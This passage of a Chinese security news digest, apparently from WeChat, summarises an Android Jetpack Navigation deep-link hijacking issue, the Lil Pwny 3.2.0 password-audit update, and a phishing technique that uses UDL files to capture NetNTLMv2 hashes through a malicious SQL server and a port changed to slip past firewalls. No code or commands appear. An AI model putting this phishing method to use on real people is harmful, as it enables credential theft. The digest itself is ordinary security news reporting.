	<img class="rich_pages wxw-img" data-ratio="0.8972222222222223" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c1f0aef3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgATesiaiaoK5k8ZhruzGhmwdzSqN7icle9PoQEJtY67h47mgcibzWn2SUaQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用隐式深层链接劫持用户会话：Android Jetpack Navigation 安全指南</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">深入探索 Android Jetpack Navigation</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg0hSeP5wYrsNDRWibkuJPsr4iabgDFFbUyzdhnO8WEh1yVXkbHRYcF0iaw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg0hSeP5wYrsNDRWibkuJPsr4iabgDFFbUyzdhnO8WEh1yVXkbHRYcF0iaw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122814451184284"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Jetpack Navigation库中的深度链接机制可能会被恶意利用，导致应用的安全性受损。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使开发者没有在应用中声明深度链接，Navigation库自动生成的内部深度链接也可能被攻击者利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Google对于这一问题的文档警告不够充分，未能全面反映潜在的安全风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开发者应该谨慎使用Jetpack Navigation库，并考虑自己实现导航逻辑以确保应用的安全性。</section></li></ul>
	<br/>
	<p>🏷️: Android, Jetpack, 导航库, 安全漏洞, 隐式深层链接</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 Lil Pwny 3.2.0更新：优化Active Directory密码审计</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Lil Pwny 3.2.0 发布，为主动目录密码审计工具带来了显著的增强，包括对有 I been pwned 密码数据库的本地审计、标准输出的美化和功能增强、自定义密码列表的扩展生成方法、识别用户名与密码相同的账户以及过滤 Active Directory 输出的功能。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Lil Pwny 3.2.0 更新：简化 Active Directory 密码审计</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg7urMgaUiaQmEzlCf5pxqXlOyMMbRyInticjsOYJTKVgwuSFmvwPraicZg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg7urMgaUiaQmEzlCf5pxqXlOyMMbRyInticjsOYJTKVgwuSFmvwPraicZg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855184428225111"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">本地审计：Lil Pwny 3.2.0 支持本地审计，提高了安全性，避免了敏感数据的泄露风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">用户体验改进：通过对标准输出的美化和功能增强，提升了用户的使用体验。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自定义密码列表增强：通过生成常见变体，提高了对自定义密码列表的审计效率和准确性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">账户安全风险识别：新增的功能能够识别出用户名与密码相同的账户，帮助管理员识别高风险账户。</section></li></ul>
	<br/>
	<p>🏷️: 密码审计, Active Directory, 更新, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 利用UDL文件进行网络钓鱼攻击的新技术</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">这篇文章介绍了一种利用UDL（Universal Data Link）文件进行网络钓鱼攻击的新技术。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">发现钓鱼攻击有效载荷：来自传统知识的收获</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">新型钓鱼攻击利用UDL文件</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgsA2fTmTz4u3kEhqzYibcdghiaYfMDY7ic223USZdNrpCOL3Ien59qcBvw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgsA2fTmTz4u3kEhqzYibcdghiaYfMDY7ic223USZdNrpCOL3Ien59qcBvw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855184125851112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">UDL文件可以作为一种新的网络钓鱼手段：通过发送UDL文件附件，攻击者可以诱使用户泄露凭证或哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">UDL文件的工作原理：UDL文件是一个文本文件，可以配置数据库连接信息，包括服务器名称、认证方式和数据库选择等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用UDL文件捕获NetNTLMv2哈希值：攻击者可以通过诱使用户尝试连接到一个恶意的SQL服务器来捕获哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">调整UDL文件的端口以绕过防火墙规则：通过将UDL文件中的端口从1433改为更常见的端口（如80），可能会增加绕过防火墙的成功率。</section></li></ul>
	<br/>
	<p>🏷️: 网络钓鱼, UDL文件, 攻击技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
